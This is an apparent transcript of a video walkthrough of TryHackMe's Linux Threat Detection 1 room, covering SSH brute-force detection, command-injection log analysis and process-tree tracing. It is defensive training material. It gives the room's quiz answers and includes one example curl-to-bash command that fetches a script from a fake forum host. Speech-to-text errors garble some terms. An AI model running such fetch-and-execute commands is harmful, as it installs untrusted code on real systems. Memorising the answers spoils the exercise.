Hello everyone. Today we're going to be covering the Linux Threat Detection 1 room from TryHackme. If you're in the SOC level 1 path already, you have access to this room. But with that said, let's get started. So task 1, introduction. With the rise of AI, cloud computing, and the Internet of Things, Linux systems are getting even more popular than before. However, most Linux breaches still start with common, well-known initial access techniques. If you don't know what initial access is, don't worry, I'm going to help you break it down. I'm going to help break down the concept so that way you better understand it. In this room, you will explore how to detect these techniques using the log sources you learned in the Linux logging for SOC. However, if you haven't done the Linux logging for SOC room, I highly recommend it, and you can access the room by clicking on this hyperlink. However, I'm going to help you guys better understand both what initial access is and log sources pertaining to Linux as well. Now, transitioning to the learning objectives, we're going to understand the role and risk of SSH, Secure Shell, in Linux environments. We're going to learn how internet exposed services can lead to breaches, and we're going to utilize process tree analysis to identify the origin of the attack. And we're going to practice detecting initial access techniques in realistic labs. Prerequisites for this room are, like I mentioned, to complete the Linux logging for SOC room, understand the concepts of the minor tactics and techniques, know how to navigate Linux without a GUI, and be ready for a deep dive into Linux threat detection. So that being said, let me break down some of these concepts before we start. So first, initial access. So let's go to Google and type in initial access. And the initial access refers to the first step of a cyber attack where an adversary uses an entry vector to gain a foothold inside a target network or system. It acts as the critical foundation for the rest of the attack chain, allowing threat actors to advance to privilege escalation, lateral movement, and payload deployment. And to get more information, we can click on initial access here by MITRE. And it's going to tell us what it is, such as the adversary is trying to get into your network. And it consists of techniques that use various entry vectors to gain their initial foothold within a network. And techniques used to gain a foothold include targeted spear phishing and exploiting weaknesses on public-facing web servers. Footholds gained through initial access may allow for continued access like valid accounts and use of external remote services, or may be limited use due to changing passwords. Additionally, you can think of techniques as the how, such as how would an adversary try to get into your network? Would they use content injection? Would they use drive-by compromise? Would they exploit a public-facing application? External remote services, phishing, you name it. There's a lot of techniques here. I recommend to go through these so that way you better understand the initial access techniques that adversaries use to try to get into your network. But also, initial access is the what. What is an adversary trying to do? Initial access. How are they trying to get initial access? They're using, for example, phishing with a phishing email with a spear phishing attachment. So that is what initial access is. It refers to the first step of a cyber attack where an adversary uses an entry vector to gain a foothold inside a target network or system. And some key entry methods associated with adversaries can be phishing and social engineering, stolen credentials, exploitation, supply chain compromise, or movable media. And this is how you would secure yourself and overall defend against initial access as well. So overall, I highly recommend you using and bookmarking the initial access MITRE attack URL because it's going to help you better understand initial access, and overall the MITRE attack framework is just a really great resource to help you better understand how adversaries work from a tactics and techniques perspective. Next, we are also going to learn about the log sources associated with Linux. So we're going to go here, and instead of initial access, we're going to type what are the common log sources associated with Linux pertaining to security operations or SOC. All right. In security operations centers or SOC, visibility into Linux environments is critical for detecting malicious activity, tracking unauthorized configurations, and identifying the initial access methods used by attackers. And here are the most common and vital Linux log sources monitored by a SOC, structured by their functional category. We have, for example, authentication and authorization logs. You can find these logs in the var directory and they are called var log auth.log. This is your file path. This file path and overall log tracks all authentication events, including successful and failed SSH logins, user creation, group modifications, and elevation attempts. Also, there is pluggable authentication modules logs. What that is that it is integrated directly into the authentication logs. PAM, or pluggable authentication modules, provides granular visibility into the specific subsystems or multi-factor authentication modules being queried. You also have your system and kernel logs, such as a varlog syslog for Debian and Ubuntu flavors of Linux, and you also have varlog messages for Red Hat and CentOS. And you also have DMSG kernel ring buffer. This captures hardware changes, driver states, and low-level kernel errors. So it's going to be for your kernel, and this is going to be your system logs, both for Debian and Ubuntu. You have syslog. For Red Hat and CentOS, you have messages. And you also have advanced audit and process tracking logs, such as audit-d or audit.log. The Linux audit framework tracks security-relevant information based on pre-configured rules. Also, there is sysmon for Linux as well, which is an extension of the popular Windows tool sysmon, which uses extended Berkeley packet filters to log process creation, network connections, and file modifications with unique process GUIDs, making it highly effective for mapping activities to the minor attack framework. You also have the command history and shell activity logs, such as bash history and .zh history and shell counting. Servers and finally, we have our service and application logs, because web-facing and network accessibility services are the most frequent targets for external exploitation. So having these logs will provide you really great visibility into that activity. So pertaining to web server logs, there's two important file paths to understand. That is varlog nginx and varlog apache 2. What these do is that they track incoming HTTP and HTTP requests. You can see these. You can see this information in access.log. And for server problems, you can check the error.log. These are vital for detecting SQL injection, local file inclusion, and web shell deployments. And also you have your cron logs, varlog cron, and what this does is that it logs scheduled background tasks, because attackers frequently modify cron jobs to establish persistent long-term access to a network. So hopefully this gets you a better understanding of the different logs associated with Linux, so that way as a SOC analyst or someone who is a cybersecurity analyst or wants to learn what logs are valuable to investigate Linux environments, hopefully this helps you better understand the different types and where to find them in their use case as well. So that being said, we are now going to set up the virtual environment by clicking on the Start Lab button. And then we're going to need to switch to root to do some of the tasks. So in order to do that, we will do sudo su. So we're going to give it some time to start up, but there's also another option for, alternatively, you can access the VM from your own VPN connected machine with the credentials which are here, which is Ubuntu for your username, and your password is secure exclamation mark. And once this machine loads, we'll see the IP address as well. So we'll give it some time to load, but we do have our timer, which is how much we have until the attack box expires. We can exit split view. We can terminate the machine. We can extend the machine timer, and we can also view in full screen as well. So let that load. And then we'll get on with doing the room. So I'll give it some time, and we should see. Yes, we see the IP address. So if you wanted to use, if you wanted to go the VPN connection method routes, you can see the instructions here. And this will help you better understand how to connect your VPN for, using OpenVPN, Squawker VPN, or you can use the attack box as well. And here we go. We got our terminal. So let's get started. All right. Task 2, initial access via SSH. So, for some background information, the popularity of SSH. One of the most popular initial access methods on Linux servers is exposed SSH, a common remote access service used by IT systems worldwide. Furthermore, nearly every internet-facing Linux machine has SSH enabled, with Showdown reporting over 40 million machines in 2025, and only some administrators enforce a secure key-based authentication, while others still rely on weak passwords and leave their systems vulnerable to brute force attacks. So we can use, for example, we can use Census or we can use Shodan. Census is another really great one. So we're going to use Census, and then we're going to look at SSH, and it's going to show us, yes, this is going to show us basically SSH. There's also Shodan as well. Alright, so we have 34 million over basically, that is the total amount of machines that have SSH enabled. So we can see, for example, software vendors, software products, certificate labels, issuer, host labels, protocols. So for example, SSH. And we still have that, and we can also see like services, match fields, so on and so forth. So overall, highly recommend Shodan and Census because they're going to provide you really, really valuable information pertaining to what devices have what in terms of protocols, are you internet facing, that sort of thing. So if we use Shodan instead, so we're going to use Shodan, SSH. And it should be free. And we see devices associated with SSH. We see the top countries listed here, top ports, top organizations, products, operating systems. So overall, Shodan and Census, highly recommend those websites because it's going to help you better understand what devices on your network have what protocol enabled and other really beneficial information as well. All right. So, pertaining to initial access via SSH, much like with RDP on Windows, which stands for the Remote Desktop Protocol, and that is port 3389, SSH is both powerful and often poorly defended. In fact, both protocols are tracked under the External Remote Services Miner technique. So if we click that, we can go to the Miner technique. And it was going to provide us really beneficial information such as, there we go. Adversaries may leverage external facing remote services to initially access and or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. And additionally, services such as Windows Remote Management and VMC can also be used externally. So what this does is that it allows us to understand that adversaries may leverage external facing remote services, such as RDP, to initially access and or persist within a network, and also provides us procedural examples of real-world observations of certain threat actor groups and threat actors that did use the technique external remote services below as well. And to get more information about the group, you can click on one of these. It's going to provide you really great information about the group. So for example, let's just click on EPT29. And we can see the group descriptions, campaigns, and techniques used. And if we do a search, external, we can see that external remote services technique is mentioned for this group as well. Awesome. All right. A lot of threat actor groups, which we saw, run fast botnets to scan the internet for systems to expose SSH and access them in two primary ways. First one is via a stolen key. Second way is through a breach password. Let's see how it usually happens. Common risk when using key-based authentication. For instance, threat actors access a service or source code where private SSH keys have been stored, like a GitHub repository, or Ensemble automation server containing SSH credentials. Additionally, threat actors steal SSH keys to a server by infecting an admin's laptop with a data stealer. Now, to the other way. Additional risks when using password-based authentication. For instance, an IT admin sets a weak SSH password for a quick test and forgets to revert the changes. Additionally, an IT support person can enable SSH for a contractor who sets the password to 12345678. And finally, a network engineer accidentally exposes an old insecure SSH server to the internet. In most real-world Linux attacks, such as those by the Outlaw Group, which you can click here to learn more about the Outlaw Group, start from one of these scenarios above. However, you should also be aware of more advanced risks like a vulnerability in the SSH server itself, such as notably Erlang or SSH session hijacking, that you will learn in more advanced rooms. So now we have an understanding of that. For this task, we have opened up the VPN and remind yourself how to work with SSH logs. So we're going to start with using this command, and then we're going to answer the questions below. I've already completed this room, but don't worry, I'm going to help you guys walk through how I got the answers so that way you better understand my problem-solving methodology and overall how to get to the answer and why is it correct as well. So we're going to use the command cat var log auth.log. So we're looking at authentication events, and we're going to grep or search for SSHD or any mention of that in the logs. So I know this looks messy, but don't worry, I'm going to view in full screen so that way we can see the logs better. And I'm going to give you guys a really great website that you can bookmark. So we're going to show you guys explain shell. What explain shell does is that we write down a command such as here, and it's going to walk us through what this command does, so that way if you want to understand what a command is and overall what the command does, this website helps break down these commands in part. So for cat, we have concatenate files, which for example, what this does is that it basically outputs what we want. So for example, we want to output authentication, the auth.log events. Then we're going to grep, or we're going to try to match based on a match pattern anything that is associated with SSH. So if we follow the lines, you can see here, grep is for print lines that match patterns, and for SSHD, where our match pattern is HD. So what this does is that we are outputting everything in the auth.logs, and we're trying to find anything associated with SSHD as our match pattern using the grep command. So hopefully that helps you better understand what this command does. And also, if you want more information, you can also click on explain grep, explain shell syntax, and since it's Linux, we can also do man cat for the manual pages. And cat concatenates files and prints them on the standard output. But also we can do and also we can do man grep as well. And what grep, egrep, fgrep, or regrep does is that it prints lines that match patterns, and also here's your options below as well. So hopefully that helps you better understand the command that we ran. So var log off.log pipe. We're setting this output to the grep command so that way we can see any events that are associated with SSHD, which you see here. Awesome. So when did the user log in via SSH for the first time? We also have a hint and our answer format as well. You might want to filter for only successful logins. So we're gonna add another pipe, and we're gonna look for accepted. So what we are going to do is that we are going to look for return user command, and we're gonna look for now accepted, so that way we can see when the user logged in. All right, let's go. Let's scroll logs. Not that far. And we can see that the first instance of accepted seems to be, we see accepted public key for Ubuntu from this IP. So we see that there it says October 22nd, which is going to be 10/22. And the date, we don't have a date, which I believe it is 2024. Yes, so it is 2024 that we are dealing with. And I am correct, yes. So we got 2024, October 22nd is our answer. Let me see if I... 1 second. It's being... Oh, so it... cat var log off dot log grep shd grep accepted. Okay, var log off dot log grep shd grep cat var log off dot log, and then we're going to send this, and we're going to grep for SSHD. SSHD, there you go. And then we're gonna grep for accepted. Capitalized. Nice. And we see, yes, 2024, 10/22, 2024 is our date. And we see a lot of events associated with that as well. So our answer is going to be 2024-10-22. Nice. All right. Did the Ubuntu user use SSH keys instead of a password for the above found date? Is it yay or nay? We also have a hint. Our hint is, remember that public key in SSH logs means key-based authentication. So we're going to go here, and we see that an accepted public key for Ubuntu. That's probably our user, Ubuntu user. We also see the key, accepted public key as well. So what they did was that the Ubuntu user used SSH keys because we see public key, and we also see SSH2 mentioned as well. So that's our SSH key and password. And overall, I would say yay, because we can see that there is public key mentioned in the logs here, which means that the user authenticated via key-based authentication rather than password. So that's yay. Next. Now we're going to move on to detecting SSH attacks. Let's talk about a breach example of SSH. Now imagine a common real-world scenario. An IT administrator enables public SSH access to the server, allows public password-based authentication, and sets a weak password for one of the support users. Combined, these three actions inevitably led to an SSH breach, as it's a matter of time before a threat actor gets the password. The log sample below, which can be found here, shows a compromise, a brute force followed by a password breach. There are three indicators of malicious logins to pay attention to. For instance, the first one is multiple failed logins, which can be found here, followed by a success. You also have logins from an external untrusted IP address, which can be found here. So if you use, for example, let's just say abuse IPDB, and we can type Bluetooth 196 dot IP 196.251.188.184. We can see here that this IP has some very suspicious stuff, such as there's abuse reports for this IP. This IP address has been reported a total of 31,813 times from 1,328 distinct sources. This was first reported on October 18, 2023, and the most recent report was from 7 months ago. And we can see here what this IP was associated with in different categories for why this IP was abused as well. But there is a note that the most recent abuse report for this IP address is from 7 months ago. It is possible that this IP is no longer involved in abusive activities. However, if you do see, for instance, an IP that has very recent abuse activities, you can see that report in the IP abuse reports section as well. So overall, this is a very suspicious IP that is external, and we need to take into mind this IP. And also, I highly recommend, if you don't already, please bookmark abuse IPDB, and feel free to use this website. It's completely free, and it's just a really great website for checking the report history of any IP address. There's an API, and also if there isn't any abusive IPs reported, you can report them as well. And to clarify, Abuse IPDB is a project dedicated to helping combat the spread of hackers, spammers, and abusive activity on the internet. Now, that being said, now we're going to detect SSH attacks. On Linux, you don't need to learn a dozen fields like login type to figure out what's going on, making log analysis more straightforward. Your starting point in detecting SSH attacks can be as simple as listing all successful SSH logins and analyzing a few fields. Let's imagine you queried the log and found 3 successful SSH logins, each of which could indicate an attack. But how would you distinguish bad from good? For instance, let's break down these logs. Login of Ensemble, which can be found here. The first login appears legitimate because it used public key authentication from an internal IP, likely an Ensemble automation account. Moreover, the login at exactly 1400 or 2 p.m. matches periodic task behavior. But to be sure, you'll still need to verify that 10.14.105.255 is an Ensemble server and review the following user activity for signs of breach. Now pertaining to the logins of J. Smith. The 2 logins of J. Smith are more interesting, as there are 3 red flags. And those red flags are, first, a password-based authentication, logins from external IPs, and time difference between the logins. One of the logins must be at night for the user, right? Still, to make a final verdict, you might need to investigate more details, such as the username. Who owns the user? Is it expected for them to log in at this time and from this IP? Source IP. What do threat intelligence tools and ACID lookups say about the IP, such as, for example, like abuse IPDB? Is it trusted or is it malicious? Login history. Was this login preceded by brute force or any other suspicious system events? And for next steps, is the login suspicious? Should I analyze user actions following the login? Now pertaining to our task, we're now going to try to uncover the breach that started via SSH password brute force. And for this task, we're going to continue with using the var log auth.log on the VM to answer these questions. So, when did the SSH password brute force start? So we're going to look for failed attempts this time. So instead of accepted, we're going to look at failed. And we can see that they started around 2025-08-21 for SSH. So I'm going to say that's the answer. Awesome. There you go. And which 4 users did the botnet attempt to breach? Our answer format should be that we separate them by a comma and that they're also in alphabetical order as well. So the 4 users are, we can see that there is root, Sol, Roy, and I believe there's a 4th one as well. We have root, we have Soy, we have Roy, and also I believe there, and also we have we have user. So that's our 4 users: user, root, Roy, and Sol. Yes, we have root, we have Roy, we have Sol, and user, separated by commas, and in alphabetical order. Now, finally, which IP managed to breach the root user? So we're going to now look at root. So we're going to change up our grep. SSHD, we're going to grep root, and we're going to look for also accepted. Grep root. So that we're only looking at logins of root. Wait a minute. Control C. Control C. A. Control Z. Alright, Control C. Exit. Oh, why is it doing that to me? There we go. Hey, why are you doing this to me? Control, stop. Stop it. Alright, let me just refresh. The command line is being weird. So let me just type in cat var auth.log, and then let's do grep sshd cat var. You didn't see that. Var log auth.log. There we go. And then we're going to look for grep root. Nice. All right. So now we're going to try to look for the IP or which managed to breach the remote root user. So we see a lot of failed logins. So we're trying to find when did the brute force activity start and when was there, followed by the failed attempts, a accepted result. So we're going to try to look for that. Okay, so we see that there's failed passwords from root with this IP, and we're trying to find accepted. So you see a lot of failed passwords. Failed. I see there's an 80 and a 45. Oh, I see that there's down here, we see disconnected from this IP, failed password for root from this IP. Okay. And then what happens? We see a lot of faileds, but then what? We see a lot of faileds. Connection. No, accepted password for root from 91.224.92.79. Let's check that out. What is that? It's not an internal IP. So we're going to use abuse IPDB. We're going to type 91.224.92.79. 91.224.92.79. Enter. We can see that it's an external IP associated with Lithuania, and we do have some IP abuse reports, which means that this IP was involved in abusive activities dating back to 4 weeks ago, and you can find the information here. So this IP is definitely suspicious. So we see that it is an external IP, and we can see that the root user had an accepted password result. So I'm going to say that our IP that breached the root user was 91.224.92.79. Nice. Awesome. All right. Task 4, initial access via services. So Linux and public services. Linux systems or servers often host public-facing systems, services, or applications such as web servers, email servers, databases, and various development or IT management tools. They also comprise the core of most firewall or VPN software. However, whenever one of these applications is compromised, the entire Linux host is at risk. And this risk is covered with the T1190 minor technique. It's called exploit public facing application. And what this is that adversaries may attempt to exploit a weakness in an internet facing host or system to initially access a network. For instance, the weakness in the system can be a software bug, a temporary glitch, or misconfiguration as well. So that's that. And we can see a few world examples here, such as CV and Zimbra collaboration, which allow the attackers to execute arbitrary OS commands or operating system, expose Docker API port, CV and Palo Alto firewalls, and WordPress plugins feature. And we can see an example of how this real-world example worked was that pertaining to the WordPress plugins feature was that first, an adversary did brute force or exploited insecure WordPress website. Then from WordPress, they uploaded a backdoor to the Linux host. So in this case, we're going to use application logs. So if you want to know whether your email server was breached, you naturally reach for the email logs. On the other hand, can you expect an application to log, I am being exploited with a 0-day right now? Of course not. That's not the nature of application logs. They rarely tell the full story, but they can still provide unique artifacts for analysis. For example, you can use web logs to detect a variety of web attacks, database logs to detect suspicious SQL queries, VPN logs to detect abnormal VPN login events, and you can also refer to other logs for specific events like bank transactions, for example. So, pertaining to web as initial access. Any publicly exposed application can lead to a Linux breach, especially of vulnerable web servers. Let's see an example. The IT team creates a simple web application called TryHackme, where you can ping the specified IP online. Internally, the app runs a system command such as ping-c22, your input, to test the connection without any input filtering. The attackers would easily spot a command injection there. And to learn more information about command injection, we can click Open Tab. And also we have a command that leads us to the command injection room, which is awesome. So basically, what command injection is that you may hear command injection referred to as remote code execution, or for instance, when a developer builds an application that takes user input and passes it into a system command without proper checks, an attacker can inject additional commands alongside the legitimate ones. And this is called command injection, which is a vulnerability that allows arbitrary OS level commands to be executed through a vulnerable application. Awesome. So now we better understand that. We can also see our web logs here using the varlog nginx exis.log file path, outputted using the cat command. So now, from the pertaining to web logs analysis, the requests coming from 10.14.105.255 seem odd. Instead of IPs, the client puts Linux commands inside the query parameters, a clear sign of command injection. Although now you will need to start a deep investigation to unravel the whole story. From web logs alone, you can assume that 10.14.105.255 is likely the attacker's IP. The ping page is vulnerable and allows code execution. The attacker executed OS commands like QMI and ls, and the entire system is now at risk because of the TryHackme vulnerability. So with that being said, can you analyze TryHackme web logs to detect the attacker's actions And also, can you use var log nginx access.log on the VM to answer the questions below? So we're now going to, let me go here, good old logs. So now we're going to do cat var log access.log, var log access var because we're dealing with web servers. There we go. Cat varlog access.log, and we're trying to find the path to the Python file the attacker attempted to open. So let's try to find the path to the Python file that the attacker attempted to open using these logs. So we can see here that there is whoami commands run to figure out, these are probably discovery commands. You can see hello. We can see an IP here. pwd to print the current working directory. And also we see here that it mentions a Python file because it has the .py extension. Opt TryHackme main.py. So let's see if that's our answer. Nice. And looking inside the open file, what's the flag you see there? So we're going to navigate to that file. So we're going to cd -opt -TryHackme ls, and then we're going to cat main.py, and we can see in here that there should be a flag. Yes, thm I am vulnerable is our flag, which can be found here. Awesome. All right, task 5. Moving on to task 5, detecting service breach. So, pertaining to process tree analysis, we're going to build a process tree. One way to detect a service breach is to use application logs, like you did in the previous task. But remember, application logs are not always available or helpful. Instead, most SOC teams rely on process tree analysis, which is a universal approach to unwrapping the initial access. For example, if we click on this report, it's going to tell us Wiz, which is a cloud security company, used a process tree to visually highlight how exactly Selenium, it's a programming framework server associated with servers, were breached and how to spot it in process creation logs. Yes. And also here's attack flow, risk of Selenium, and much, much more. So overall, if you wanted to learn more about process tree analysis, an example of it, I highly recommend checking out this report. It's very detailed, but it does show you how a process tree was used to visually highlight exactly how Selenium servers were breached, which can be found here. You see our process tree. Servers were breached and how to spot it in process creation logs as well. Awesome. All right. Now, a common SOC scenario, not SOCs, SOC Security Operations Center scenario is when you receive an alert about a suspicious command. Let's say whoami. Why was it executed? Due to IT activity? Or was it maybe a service breach? To answer this, all you need is to build a process tree and trace the command back to its parent process, as shown in the image below. So, we're going to break down how to use a process tree to uncover initial access. First, you start here. From a mysterious whoami. You see that its parent process has a PID of 3905, which can be found here. Then, you search for a process with a PID. So now you transition from the parent process PID to now the child parent ID. PID, there we go. So now we have the parent process, and now we're using that number as to search for a process with PID of 3905. The results didn't help, however. So that we're going to move on to number 3. Now we're going to search for a process with PID of 3898, which was our parent process PID. or process identifier of 3898. And look, it all started from a Python web app. So what we did was that we built a process tree. So we first started with the misdois whoami command. Then we used that PPID to look for any processes with that PID. However, that didn't help. But we moved on to number 3, which was then we used this parent process ID to then search for a process with that PID of 3898. And look, it all started from a Python web app that caused and then we saw after that, whoami commands. So, and also we can check the timestamp of the logs, and we can see that on 8/25/25/16/2011, we see that there was a Python file or Python web app. Then we see that there is suspicious whoami commands, and then finally we actually see another instance of whoami, and all this started using process tree analysis with my Python web app. So in order to do this, we're going to use audit D and process tree. So what that does is that we're going to begin by locating the suspicious command in the logs with all search-i-x whoami. Next, we're going to walk up the process tree using the PID option until you reach PID 1, which is the OS process. And the tree will eventually show that whoami was launched by a Python web application, which is opt mywebapp.py. And this immediately raises the question, was this application breached and used as an entry point? So this is an example of how we're going to trace the whoami origin. Was at first we're going to start with the parent process ID or grandparent process ID. So we're going to use here. And then we're going to use this, and then we're going to go here to find the PPID. And then we're going to search for any parent process IDs that have 3905. And look here, we see our whoami command. But also you can use the all search command to help you filter for that. Awesome. All right, next. You might wonder if whoami is simply part of the application's normal behavior. Maybe so, but that question would require web logs analysis, external research, or communication with the developers. What you can do instead is use the process tree to look for other, more dangerous commands launched by the app by listing all child processes of opt mywebapp app.py. And you may find clear evidence of the app's breach, like a malicious curl command, which can be found here. Now, let's look at the TryHackme breach from the previous task through the audit D angle. We're going to use the all search command and the example of some of the tasks to uncover the full picture. So that being said, let's first look for the PPID of a suspicious whoami command. So we're going to search for any filter. We're going to search for any results with whoami. So we're going to do, and also to better understand what whoami is, all search is that command. And what all search is that it is a tool to query audit daemon logs. And also it is a tool that can query the audit daemon logs based for events based on different search criteria like A, R, C, and much more. So we're going to quit and we're going to look for all search. We're going to use all search to look for whoami -x, and it should be, my bad, I can exit out of this. No. Alright, there we go. Alright, quit. Alright, so what we need to do is that we need to go to the audit logs, or in this case, we can look for, audit D. So try to search starting from the all search-i-x whoami command. So this should work. All search-i-x. Nice. All right, cool. We're now using the audit d.logs, and we can see, and we're trying to find the PPID of the suspicious whoami command, so we can see that the PPID is going to be 1018, which can be found here. So that's going to be our answer. Nice. Now moving up the tree, what is the PID of the TryHackme app? We also have a hint as well. Refer to the task examples and use the allsearch-i-PID command. So we're going to do allsearch-i-PID 1018. There we go. All right, now let's go find our opt TryHackme. And what is the PID of the TryHackme app? So we see TryHackme, and the PID is the parent process ID, which we were looking for, is going to be 577. Nice. And now, which program did the attacker use to open a reverse shell? A hint. We can list all TryHackme commands using the allsearch-i-PPID. In this case, it's going to be 577 because that's our parent process ID. Nice. So we're going to do allsearch-i-PPID 577. And we can see that the commands that were run, or did I do something wrong? Which program did the attacker use to open a reverse shell? I see that there was main.py, and I do see that there is Python associated with this, so I'm going to say that it is Python. Boom. Nice. All right, task 6, advanced initial access. In the previous tasks, you export initial access via SSH and expose services. But what about phishing and USB attacks? So commonly seen in Windows environments. Since Linux primarily is a server OS operated by technical people, it is harder to trick system owners into running phishing malware or inserting malicious USB. Still, the risk remains. For example, we have two scenario examples. First, an IT member looks for a solution to a server issue and desperately tries the script found in a forum, curl https shadowforum-.thm fix.sh bash. The consequence of this is that the IT member didn't check the script content and appeared to be malware silently affecting the server. If you can read more, click on this link, which is an untrustworthy TLS certificate in browsers to learn more about this, see more details, much more. And all credit goes to the author and everyone associated with this website. So all credit goes to them. And second, a developer wants to install a Python fast API package on the server, but mistypes a single letter. pip3 install fast API. What that did, and the consequence of that, was that the mistyped package was malware. Deliberately prepared and published by threat actors. This is a real world case. It can be found here. More details about it. Such as malicious pun intended, packages stole cloud tokens over 14,100 downloads before removal. What this did and what this talks about is that cybersecurity researchers have warned of a malicious campaign targeting users of the Python package index, or PyPy, repository of bogus libraries masquerading as time-related utilities, but harboring hidden functionality to steal sensitive data, such as cloud access logins, downloads here, and some names as well. So overall, make sure that you type your packages safely, please, because they can be malware, which is deliberately prepared and published by threat actors. Now we're going to look at a supply chain compromise example. While not unique to Linux, you should also be aware of supply chain compromise. This is going to be a technique, so we're going to click on this. And what this talks about is that adversaries may manipulate products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise. And and supply chain compromise can take place at any stage of supply chain, including manipulation of development tools, environment, repositories, and much, much more. So highly recommend understanding supply chain compromise technique, because these attacks breach a software first and then infect all users with the malicious updates. So since a typical Linux server uses hundreds of software dependencies maintained by different developers, the attack can come from anywhere, anytime. So let's see some examples. First, a backdoor in the XZ utils library that's part of SSH nearly led to a breach of millions of Linux servers, and the breach of the TJ Actions library resulted in a leak of thousands of secrets, like SSH keys and access tokens. So now detecting the attacks. All initial access techniques described in this room can be uncovered through a process tree analysis. And to learn more about process tree analysis, let's go to Google. There's no harm in Googling, so don't worry. And what process tree analysis is that it involves tracing the hierarchy or parent-child relationships of running processes within an operating system. And the reason why that's important is that it is a vital technique in cybersecurity and endpoint forensics used to expose the chronological execution chain, identify anomalous behaviors, and uncover the origins of malware. You can learn how to conduct that here as well. And also, here's some popular tools and frameworks to help you better understand that. And so, yes, process tree lineage analysis, which is the identification of suspicious processes executing on an endpoint device by examining the ancestry and siblings of process and the associated metadata of each node on the tree, such as process execution, duration, and other related to in order relative to siblings and ancestors. You can learn how it works, and also considerations and artifact relationships as well. And so some examples is that, for instance, you start with a trigger, such as a seam alert or a suspicious command or a connection to a known malicious IP. From there, you build a process tree to trace which application or user initiated the event, which is for instance, it can be a web server, an internal application, or an IT administrator's SSH login. Finally, you determine whether the activity is legitimate or is an indicator of malicious behavior. Let's start out with the first scenario. Why would the web app run who am I? Can it be a web application breach? So, for example, we see the who am I command. Then we see from there, no, my bad. We start with the OS process PID. We see that there's an application web server that has a PHP web application hosted on it. But then we see from this web application that there was a shell that was spawned, and the command that was run was who am I? So this is very suspicious. Additionally, why would the TryHackme app run these commands? Can it be a supply chain compromise? For instance, starting off with the OS process PID equals 1, we see our TryHackme app or servers, which is CAM-servers. But then we see commands from it, such as, for example, looking at the process tree, wget, base64, and tar. What this means is that it could be affiliated with data exfiltration activity, because the attacker could be encrypting the content or zipping it using tar, and then sending off to a server using wget. But then also, why would Tom log in via SSH and download a crypto miner? If you don't know what a crypto miner is, don't worry, I got you. So we're gonna type crypto miner, and we're not gonna buy it. So what is a crypto miner? Crypto miner like XM rig. Give it some time. It's thinking, searching. Awesome. All right, so XM pertaining to cybersecurity investigations. Please. There we go. In cybersecurity investigations, XMRig is rarely viewed as a hobbyist tool and is instead treated as a major payload indicator for crypto tracking or unauthorized resource exploitation. Threat hunting and incident response teams focus on XMRig because its presence usually signals that an attacker has already bypassed perimeter defenses. More information can be found here. Because it's an indicator of initial access, the canary in the coal mine, and much, much more. And so you can see some core artifacts and forensic evidences, and network connections, execution evasion techniques, and common threat hunting strategies for teams. And also you can ask more. So that being said, if you see XMRig, make sure you look into the activity more because it could be an indicator of malicious behavior. Such as, for example, starting off with the OS process. We see that there's an SSH server that had a session with the Tom user. But then we saw from that session that there was a shell spawn using curl. And then we saw from there that XMRig was also mentioned as well. So that being said, process tree analysis, let's break it down. You start with a trigger, such as a seam alert or a suspicious command or a connection to a known malicious IP. From there, you build a process tree to trace which application or user, for instance here, initiated the events, whether it's a web server or web application, an internal application, or an IT administrator's SSH session. And then finally, you determine whether the activity is legitimate or is an indicator of malicious behavior. So that being said, which initial access technique is likely used if a trusted app suddenly runs malicious commands? So we can see here, yes, runs malicious commands. All right, here we go. So it also mentions that while supply chain compromise can impact any component of hardware or software, adversaries looking to gain execution, which is them executing malicious commands, have often focused on malicious additions to legitimate software in software distribution or update channels. So what this means is that popular open source projects that are used as dependencies in many applications may also be targeted as a means to add malicious code to users of these dependencies, which this could be an example of how an attacker runs its malicious commands as well. So I highly recommend understanding supply chain compromise because it is an initial access technique. So we're going to go to associated with initial access. Yes, here we go. Supply chain compromise. It's like it talks about and is that it's a initial access technique that is likely used if a trusted app suddenly runs malicious commands, which we can see here. Our trusted app, for example, TryHackme, is running malicious commands such as, which could be wget base64 or tar that could be used for malicious purposes. So supply chain compromise. And now, which detection method can you use to detect a variety of initial access techniques? It's going to be process tree analysis because all initial access techniques described in this room can be uncovered through a process tree analysis. And to learn more about that, we can talk about process tree analysis more. I believe it is mentioned in task 5. Here we go. Awesome. Yes, it mentions that one way to detect a server's breach is to use application logs like you did in the previous task. But remember, application logs are not always available or helpful. Instead, most SOC teams rely on process tree analysis, which is a universal approach to unwrapping the initial access. So overall, process tree analysis can be used to uncover and overall get more information about all initial access techniques. So our answer is going to be process tree analysis, which can be found here, which is our detection method that can be used to detect a variety of initial access techniques. Awesome. All right, task Task 7, Conclusion. Great job! We explored all the initial access techniques, and especially, not all of them, the ones covered in this room, and an especially complex topic, the process tree analysis. While it may seem hard to apply, you will happily use it on a daily basis with some practice and a more convenient interface. Using the system log sources in Audit D. If you don't know what Audit D is, don't worry. What is Audit D and why is it important for Linux system investigations? Audit D or Audit Daemon is the user space component of the Linux auditing system. And what it does is that it is responsible for collecting audit records generated by the Linux kernel, because it's based on pre-configured rules, and you can also write them directly to a log file, such as, for example, typically var log audit.d. And to clarify, Audit D operates at the kernel level, and it monitors system calls directly, meaning it can track exactly what a process or user is doing on the system, regardless of whether the process wants to be monitored. And next. So that is what Audit D is. And overall, we learned how to also identify how attacks start and are now ready to learn how they continue. So key takeaways from this room is that we learned attacks on SSH are widespread, but they are easy to detect via authentication logs. We learned about exposed services are always a risk since they can lead to a whole Linux compromise. We learned while phishing is not common on Linux, human-led and supply attacks are still possible. And we also learned, finally, process tree analysis is your best approach in identifying the initial access techniques. Answer the questions below. Let's continue. There's no answer needed. And we completed all the tasks. Awesome. Alrighty. I hope you enjoyed this walkthrough on the Linux threat detection room. Hope you better understand what the concepts are and overall learning objectives in this room as well. Like I said, if you want to have any prerequisites or any other better understanding, here are the resources provided, such as, for example, the report by Wiz on Solarium Grid, a really nice blog here, another one as well, some techniques that were covered, the logs themselves, a group, how to get this is your instructions for different VPNs and also to use the attack box as well. Explain shell to get more information about what a command is and how it works. The minor attack framework, show it in. Abuse IPDB, and you can also always use Google and AI to help you better understand concepts as well. So overall, I hope you enjoyed this walkthrough. Hope you had fun learning. I will see you guys in the next walkthrough. Have a great rest of your day and keep up the great work. Peace.